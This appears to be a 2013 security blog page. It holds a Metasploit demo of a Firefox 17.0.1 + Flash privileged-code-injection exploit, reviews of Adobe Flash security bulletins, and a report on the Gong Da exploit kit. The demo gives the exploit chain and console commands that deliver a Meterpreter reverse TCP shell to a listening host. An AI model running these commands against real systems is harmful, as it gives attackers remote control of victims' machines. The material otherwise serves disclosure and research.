Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Marius Mlynski the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-05-15

PoC provided by :

Marius Mlynski
joev
sinn3r

Reference(s) :

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s) :

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with :

Firefox 17.0.1

Description :

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the(CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands :

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

Adobe has release, the May 14th 2013, during his May Patch Tuesday, one Adobe Flash security bulletin dealing with 13 vulnerabilities. This security bulletin has a Critical severity rating. The associated vulnerabilities have all a 10.0 CVSS base score.

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

APSB13-14 is concerning :

  • Adobe Flash Player 11.7.700.169 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.280 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.54 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.50 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1530 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1660 and earlier versions for Android
  • Adobe AIR 3.7.0.1530 SDK & Compiler and earlier versions

CVE-2013-2728 (10.0 CVSS base score), CVE-2013-3324 (10.0 CVSS base score), CVE-2013-3325 (10.0 CVSS base score), CVE-2013-3326 (10.0 CVSS base score), CVE-2013-3327 (10.0 CVSS base score), CVE-2013-3328 (10.0 CVSS base score), CVE-2013-3329 (10.0 CVSS base score), CVE-2013-3330 (10.0 CVSS base score), CVE-2013-3331 (10.0 CVSS base score) and CVE-2013-3332 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

CVE-2013-3333 (10.0 CVSS base score), CVE-2013-3334 (10.0 CVSS base score) and CVE-2013-3335 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

Gong Da Exploit Kit Add Java CVE-2013-1493 & IE CVE-2012-4792 & IE CVE-2012-4969 Support

Like other Exploit Kits, Gong Da has add support for Oracle Java CVE-2013-1493 vulnerability, fixed in Oracle Java 6 Update 17, has also add support for Microsoft Internet Explorer CVE-2012-4969 and CVE-2012-4792 vulnerabilities, fixed in an emergency patch in September 2012 and January 2013.

Here is the new code for CVE-2013-1493.

Capture d’écran 2013-04-14 à 23.39.38

And here the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).

Capture d’écran 2013-04-14 à 23.39.48

Also a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.

Capture d’écran 2013-04-14 à 23.40.15

As always this new version of Gong Da Exploit Kit has been discovered on a Korean web site.

Gong Da Pack has involve to the following diagram.

Gong Da EK 1.5

Here under some information s regarding the different files:

Normally Gong Da was used against gamers, but this time the loaded malware seem to be different (analysis on ThreatExpert)

APSB13-11 – Adobe Flash April 2013 Security Bulletin Review

Adobe has release, the 9 April 2013, during his April Patch Tuesday, one Adobe Flash security bulletin dealing with four vulnerabilities. This security bulletin has a Critical severity rating.

APSB13-11 – Security updates available for Adobe Flash Player

APSB13-11 is concerning :

  • Adobe Flash Player 11.6.602.180 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.275  and earlier versions for Linux
  • Adobe Flash Player 11.1.115.48 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.44 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.6.0.6090 and earlier versions for Windows, Macintosh and Android
  • Adobe AIR 3.6.0.6090 SDK & Compiler and earlier version

CVE-2013-1378 (7.5 CVSS base score), CVE-2013-1379 (7.5 CVSS base score) and CVE-2013-1380 (7.5 CVSS base score) have been discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security TeamCVE-2013-2555 (10.0 CVSS base score) has been discovered and privately reported by a VUPEN Security reported through TippingPoint’s Zero Day Initiative.